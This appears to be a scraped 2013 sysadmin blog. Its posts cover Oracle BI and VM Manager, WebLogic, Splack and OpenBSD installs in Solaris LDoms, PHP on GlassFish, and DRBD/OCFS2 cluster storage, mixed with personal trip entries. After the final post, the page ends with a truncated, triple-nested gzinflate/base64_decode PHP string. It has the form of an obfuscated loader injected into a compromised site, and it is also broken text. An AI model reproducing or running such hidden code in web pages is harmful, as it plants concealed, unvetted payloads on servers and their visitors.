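    $ ssh -X user@hpux-host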

    default Oracle Business Intelligence URLs:

    Component                           Default URL                    Port
    Oracle BI Presentation Services     http://host:9704/analytics     9704
    WebLogic Console                    http://host:7001/console       7001
    Enterprise Manager                  http://host:7001/em            7001
    Business Intelligence Publisher     http://host:9704/xmlpserver    9704
    Real-Time Decisions                 http://host:9704/ui            9704

    to be continued…



[video]Beautiful Dangerous

  ozzie / 23/05/2013

Installing Oracle VM Manager

  ozzie / 23/05/2013

Oracle VM Manager with Oracle Linux 6.x as the base OS. Install the OS as usual…

Minimum spec prerequisites for OVM:

  • Memory: 1.5 GB (4 GB if using Oracle Database XE)
  • Processor: 64-bit
  • Swap: > 2.1 GB
  • Disk space: 5 GB for /u01 and 2 GB for /tmp

 

All the sources can be downloaded from: https://edelivery.oracle.com/
To update Oracle Linux packages via yum, you can read about that here.

Here is the list of ports needed for OVM – OVS – Client communication:



newborn race

  ozzie / 14/05/2013



#:-s #:-s finally found time to edit the adventure video from OutBound D2M Hasil Kebon 2013

Tanakita CampSite: 1-3 March 2013



Oracle Enterprise Cloud Infrastructure

  ozzie / 23/04/2013

Exploring & building cloud & Solaris virtualization (LDoms & Zones).



Just a review: Oracle Enterprise Manager Ops Center. All the features are there: monitoring, provisioning, managing, maintaining… even development is covered, deployment plans included… migrating zones & VMs… server & storage pools…


Enterprise Manager Ops Center 12c & Enterprise Manager Cloud Control 12c



Oracle WebLogic

  ozzie / 21/04/2013

*Just a reminder
sometimes the install is done through the GUI, configuring the domain via quickstart.sh #:-s

for SOLARIS machines without a GUI:

# {WLS_HOME}/common/bin/config.sh -mode=console

oh yeah #-o..
on Solaris 11 you have to install the JDK (there's no javac by default)

#  pkg  install --accept pkg:/developer/java/jdk@1.7.0.7-0.175.1.0.0.24.0


splack [slackware @ SPARC]

  ozzie / 10/04/2013

Installing Splack on the SPARC architecture:

Since it's running inside a Solaris LDom, just allocate resources as needed :D (a quick sketch below)
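
A minimal sketch of that allocation (the domain name splack and the sizes are assumptions, not from the original session):

# ldm add-domain splack
# ldm add-vcpu 8 splack
# ldm add-memory 4G splack
# ldm add-vnet vnet0 primary-vsw0 splack
# ldm bind splack            # add vdisks via add-vdsdev/add-vdisk first, as in the OpenBSD post below
# ldm start-domain splack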

[    0.000000] PROMLIB: Sun IEEE Boot Prom 'OBP 4.33.6.b 2012/12/11 20:50'
[    0.000000] PROMLIB: Root node compatible: sun4v
[    0.000000] Linux version 2.6.23.17-gl64090105 (root@toad) (gcc version 4.2.3) #2 SMP Tue Jan 6 04:22:34 Local time zone must be set--see zic m
[    0.000000] ARCH: SUN4V
[    0.000000] Ethernet address: 00:14:4f:fb:fa:64
[    0.000000] OF stdout device is: /virtual-devices@100/console@1
[    0.000000] PROM: Built device tree with 35549 bytes of memory.
[    0.000000] MDESC: Size is 19680 bytes.
[    0.000000] PLATFORM: banner-name [SPARC Enterprise T5220]
[    0.000000] PLATFORM: name [SUNW,SPARC-Enterprise-T5220]
[    0.000000] PLATFORM: hostid [84fbfa64]
[    0.000000] PLATFORM: serial# [00ab4130]
[    0.000000] PLATFORM: stick-frequency [5458c3a0]
[    0.000000] PLATFORM: mac-address [144ffbfa64]
[    0.000000] PLATFORM: watchdog-resolution [1000 ms]
[    0.000000] PLATFORM: watchdog-max-timeout [31536000000 ms]
[    0.000000] PLATFORM: max-cpus [64]
[    0.000000] On node 0 totalpages: 1046987
[    0.000000]   Normal zone: 7278 pages used for memmap
[    0.000000]   Normal zone: 0 pages reserved
[    0.000000]   Normal zone: 1039709 pages, LIFO batch:15
[    0.000000]   Movable zone: 0 pages used for memmap
[    0.000000] Built 1 zonelists in Zone order.  Total pages: 1039709
...
...
...
 
 
Welcome to the Splack Linux installation disk! (version 12.1-pre1)
 
######  IMPORTANT!  READ THE INFORMATION BELOW CAREFULLY.  ######
 
- You will need one or more partitions of type 'Linux' prepared.  It is also
  recommended that you create a swap partition (type 'Linux swap') prior
  to installation.  For more information, run 'setup' and read the help file.
 
- If you're having problems that you think might be related to low memory (this
  is possible on machines with 64 or less megabytes of system memory), you can
  try activating a swap partition before you run setup.  After making a swap
  partition (type 82) with cfdisk or fdisk, activate it like this: 
    mkswap /dev/<partition> ; swapon /dev/<partition>
 
- Once you have prepared the disk partitions for Linux, type 'setup' to begin
  the installation process.  
 
- If you do not have a color monitor, type:  TERM=vt100
  before you start 'setup'.
 
You may now login as 'root'.
 
slackware login: 
 
Linux 2.6.23.17-gl64090105.
 
If you're upgrading an existing Slackware system, you might want to
remove old packages before you run 'setup' to install the new ones. If
you don't, your system will still work but there might be some old files
left laying around on your drive.
 
Just mount your Linux partitions under /mnt and type 'pkgtool'. If you
don't know how to mount your partitions, type 'pkgtool' and it will tell
you how it's done.
 
To partition your hard drive(s), use 'cfdisk' or 'fdisk'.
To activate PCMCIA/Cardbus devices needed for installation, type 'pcmcia'.
To start the main installation, type 'setup'.
 
root@slackware:/#


Beautiful Dangerous

  ozzie / 01/04/2013

Tanjung Lesung


Tanjung Lesung, 29 – 31 March 2013





Install OpenBSD in a Solaris LDom on a SUN Enterprise T5220 machine.
Create the guest at the domain controller: with just 8 CPUs, 4 GB RAM & 2 network interfaces :p

# ldm add-domain OpenBSD
# ldm add-vcpu 8 OpenBSD
# ldm add-memory 4G OpenBSD 
# ldm add-vnet vnet1 primary-vsw0 OpenBSD
# ldm add-vnet vnet2 primary-vsw1 OpenBSD

Create the ZFS volumes for the disks:

# zfs create Ldom/OpenBSD
# zfs create -V 40gb Ldom/OpenBSD/disk0
# zfs create -V 80gb Ldom/OpenBSD/disk1


# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk0  openbsd-disk0@primary-vds0
# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk1  openbsd-disk1@primary-vds0
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm add-vdisk vdisk2 openbsd-disk1@primary-vds0 OpenBSD
# ldm bind OpenBSD
# ldm set-var auto-boot\?=false OpenBSD

Download the OpenBSD ISO for the Sparc64 architecture & attach it to the domain:

# wget ftp://ftp.openbsd.org/pub/OpenBSD/5.2/sparc64/install52.iso
# ldm add-vdsdev /export/home/ozzie/install52.iso iso@primary-vds0
# ldm add-vdisk cdrom iso@primary-vds0 OpenBSD



At this point the virtual device (cdrom) for the OpenBSD installer has been created.

Activate the guest domain & install OpenBSD as usual…
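
The console port (the 50xx in the telnet below) is the vntsd port assigned to the guest; once the domain is bound it shows up in the CONS column of:

# ldm list OpenBSD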

# ldm start-domain OpenBSD
# telnet localhost 50xx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
 
Connecting to console "OpenBSD" in group "OpenBSD" ....
Press ~? for control options ..
 
{0} ok 
{0} ok 
{0} ok devalias
cdrom                    /virtual-devices@100/channel-devices@200/disk@1
vdisk1                   /virtual-devices@100/channel-devices@200/disk@0
...
...
...
 
Boot device: /virtual-devices@100/channel-devices@200/disk@1:f  File and args: 
OpenBSD IEEE 1275 Bootblock 1.3
..>> OpenBSD BOOT 1.4
Trying bsd...
Booting /virtual-devices@100/channel-devices@200/disk@0:a/bsd
6605424@0x1000000+5520@0x164ca70+173400@0x1800000+4020904@0x182a558 
symbols @ 0xfedd02c0 81+405456+255993 start=0x1000000
[ using 662248 bytes of bsd ELF symbol table ]
console is /virtual-devices@100/console@1
Copyright (c) 1982, 1986, 1989, 1991, 1993
	The Regents of the University of California.  All rights reserved.
Copyright (c) 1995-2012 OpenBSD. All rights reserved.  http://www.OpenBSD.org
 
OpenBSD 5.2 (GENERIC.MP) #236: Mon Jul 30 16:38:18 MDT 2012
    deraadt@sparc64.openbsd.org:/usr/src/sys/arch/sparc64/compile/GENERIC.MP
real mem = 4294967296 (4096MB)
avail mem = 4210024448 (4014MB)
mainbus0 at root: SPARC Enterprise T5220
cpu0 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu1 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu2 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu3 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu4 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu5 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu6 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu7 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
vbus0 at mainbus0
"flashprom" at vbus0 not configured
"n2cp" at vbus0 not configured
"ncp" at vbus0 not configured
vrng0 at vbus0
vcons0 at vbus0: ivec 0x111, console
cbus0 at vbus0
vnet0 at cbus0 chan 0x0: ivec 0x200, 0x201, address 00:14:4f:f8:45:94
vnet1 at cbus0 chan 0x3: ivec 0x206, 0x207, address 00:14:4f:fa:c4:73
vdsk0 at cbus0 chan 0x6: ivec 0x20c, 0x20d
scsibus0 at vdsk0: 2 targets
sd0 at scsibus0 targ 0 lun 0: <SUN, Virtual Disk, 1.0> SCSI3 0/direct fixed
sd0: 40960MB, 512 bytes/sector, 83886080 sectors
"virtual-domain-service" at cbus0 not configured
vrtc0 at vbus0
vscsi0 at root
..
..
..
..

Install as usual, then clean up once finished:

# ldm set-var auto-boot\?=true OpenBSD
# ldm stop OpenBSD
LDom OpenBSD stopped
# ldm remove-vdisk cdrom OpenBSD 
# ldm remove-vdsdev iso@primary-vds0

Hope it's useful… :p



OutBound D2M Hasil Kebon 2013

  ozzie / 04/03/2013

Tanakita Campsite: 1-3 March 2013



PHP @ GlassFish

  ozzie / 26/02/2013

source: http://quercus.caucho.com/

Running PHP scripts on an Oracle GlassFish server:

web.xml

<servlet>
   <servlet-name>Quercus</servlet-name>
   <servlet-class>com.caucho.quercus.servlet.QuercusServlet</servlet-class>
   <init-param>
      <param-name>ini-file</param-name>
      <param-value>WEB-INF/php.ini</param-value>
   </init-param>
</servlet>
 
<servlet-mapping>
   <servlet-name>Quercus</servlet-name>
       <url-pattern>*.php</url-pattern>
</servlet-mapping>
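
With the servlet mapping in place, a quick smoke test is to drop a phpinfo file into the deployed webapp and request it (a hedged sketch; the path and app name are hypothetical, and it assumes the Quercus JARs are already in WEB-INF/lib):

# echo '<?php phpinfo(); ?>' > /path/to/yourapp/info.php
# curl http://localhost:8080/yourapp/info.php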


Cluster storage with DRBD & OCFS2

  ozzie / 17/02/2013

Clustered storage with DRBD & OCFS2.

/etc/drbd.conf

global { usage-count no; }
resource res0 {
  protocol C;
  startup { become-primary-on both;  wfc-timeout 10; degr-wfc-timeout     30; }
#  startup {  wfc-timeout 10; degr-wfc-timeout     30; }
  disk { on-io-error detach; 
#fencing resource-and-stonith;
} 
net {   
    after-sb-0pri discard-zero-changes;
    after-sb-1pri discard-secondary;
    after-sb-2pri disconnect;
    allow-two-primaries; 
    cram-hmac-alg "sha1"; 
    shared-secret "m0ny3t"; 
} 
syncer { rate 10M; }
on OL5-dev01 {
    device /dev/drbd0;
    disk /dev/xvdb;
    address 10.0.5.11:7788;
    meta-disk internal;
}
on OL5-dev02 {
    device /dev/drbd0;
    disk /dev/xvdb;
    address 10.0.5.12:7788;
    meta-disk internal;
}
# handlers { outdate-peer "/sbin/kill-peer.sh";  }
}

/etc/ocfs2/cluster.conf

cluster: 
        node_count = 2
        name = ocfs2
node: 
        ip_port = 7777 
        ip_address = 10.0.5.11
        number = 0 
        name = OL5-dev01
        cluster = ocfs2
node: 
        ip_port = 7777 
        ip_address = 10.0.5.12
        number = 1
        name = OL5-dev02
        cluster = ocfs2
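
Before the overview below can show a sync in progress, the DRBD metadata has to be created and the resource brought up on both nodes, then one node promoted to force the initial sync (a hedged sketch for the DRBD 8.3-era syntax used here):

# drbdadm create-md res0                                # on both nodes
# drbdadm up res0                                       # on both nodes
# drbdadm -- --overwrite-data-of-peer primary res0      # on the first node only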

# drbd-overview 
  1:res0  SyncSource Primary/Secondary UpToDate/Inconsistent C r---- 
        [=>..................] sync'ed: 14.3% (xxx/xxxxxxx)M
# drbd-overview 
  1:res0  Connected Primary/Secondary UpToDate/UpToDate C r----

On the second node:

# drbdadm primary res0
# drbd-overview 
  1:res0  Connected Primary/Primary UpToDate/UpToDate C r----

After the sync completes, format with OCFS2, adding the option --fs-feature-level=max-compat:

# mkfs -t ocfs2 -N 2 --fs-feature-level=max-compat -L ocfs2_drbd0 /dev/drbd0
mkfs.ocfs2 1.8.0
Cluster stack: classic o2cb
Overwriting existing ocfs2 partition.
Proceed (y/N): y
Label: ocfs2_drbd0
Features: backup-super strict-journal-super
Block size: 4096 (12 bits)
Cluster size: 4096 (12 bits)
Volume size: 10737053696 (2621351 clusters) (2621351 blocks)
Cluster groups: 82 (tail covers 8615 clusters, rest cover 32256 clusters)
Extent allocator size: 8388608 (2 groups)
Journal size: 67108864
Node slots: 2
Creating bitmaps: done
Initializing superblock: done
Writing system files: done
Writing superblock: done
Writing backup superblock: 2 block(s)
Formatting Journals: done
Growing extent allocator: done
Formatting slot map: done
Formatting quota files: done
Writing lost+found: done
mkfs.ocfs2 successful

 
# debugfs.ocfs2 -R stats /dev/drbd0
	Revision: 0.90
	Mount Count: 0   Max Mount Count: 20
	State: 0   Errors: 0
	Check Interval: 0   Last Check: Mon Feb 18 22:15:32 2013
	Creator OS: 0
	Feature Compat: 3 backup-super strict-journal-super
	Feature Incompat: 0 
	Tunefs Incomplete: 0 
	Feature RO compat: 0 
	Root Blknum: 5   System Dir Blknum: 6
	First Cluster Group Blknum: 3
	Block Size Bits: 12   Cluster Size Bits: 12
	Max Node Slots: 2
	Extended Attributes Inline Size: 0
	Label: ocfs2_drbd0
	UUID: 5D05B514F6CA481AA0B1FF35B6DFF943
	Hash: 0 (0x0)
	DX Seeds: 0 0 0 (0x00000000 0x00000000 0x00000000)
	Cluster stack: classic o2cb
	Cluster flags: 0 
	Inode: 2   Mode: 00   Generation: 4135372128 (0xf67cc560)
	FS Generation: 4135372128 (0xf67cc560)
	CRC32: 00000000   ECC: 0000
	Type: Unknown   Attr: 0x0   Flags: Valid System Superblock 
	Dynamic Features: (0x0) 
	User: 0 (root)   Group: 0 (root)   Size: 0
	Links: 0   Clusters: 2621351
	ctime: 0x51224594 0x0 -- Mon Feb 18 22:15:32.0 2013
	atime: 0x0 0x0 -- Thu Jan  1 07:00:00.0 1970
	mtime: 0x51224594 0x0 -- Mon Feb 18 22:15:32.0 2013
	dtime: 0x0 -- Thu Jan  1 07:00:00 1970
	Refcount Block: 0
	Last Extblk: 0   Orphan Slot: 0
	Sub Alloc Slot: Global   Sub Alloc Bit: 65535
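
Before mounting, the O2CB cluster stack has to be configured and brought online on both nodes (a hedged sketch using the standard o2cb init script):

# service o2cb configure          # answer yes to load on boot; cluster name: ocfs2
# service o2cb online ocfs2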

OCFS2 can then be mounted with:

# mount -o noatime,nodiratime /dev/drbd0 /data

Sample output on node 2:

# drbd-overview 
  0:res0/0  Connected Primary/Primary UpToDate/UpToDate C r----- /data ocfs2 10G 163M 9.9G 2%


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>